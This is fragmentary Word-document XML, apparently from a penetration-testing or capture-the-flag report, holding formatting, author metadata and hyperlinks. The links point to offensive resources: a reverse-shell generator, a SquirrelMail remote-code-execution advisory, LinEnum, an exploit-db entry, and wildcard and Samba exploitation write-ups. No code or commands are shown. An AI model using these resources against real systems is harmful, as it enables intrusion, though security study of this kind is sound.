      <w:ind w:left="220"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225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revshells.com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tldp.org/HOWTO/SMB-HOWTO-8.html" TargetMode="Externa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legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rebootuser/LinEnum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www.exploit-db.com/exploits/25971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github.com/CuppaCMS/CuppaCMS/issues/33" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xm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helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/?ref=blog.tryhackme.com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hyperlink" Target="https://medium.com/@uukail2005/samba-smbd-3-x-4-x-exploitation-59a8d9431ea1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890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COELHO ROCHA PINTO</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>GUILHERME THOMASI RONCA</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2025-10-07T19:16:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-08T20:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-08T20:04:00Z</dcterms:modified>
  <dc:language>en-US</dc:language>
</cp:coreProperties>
</file>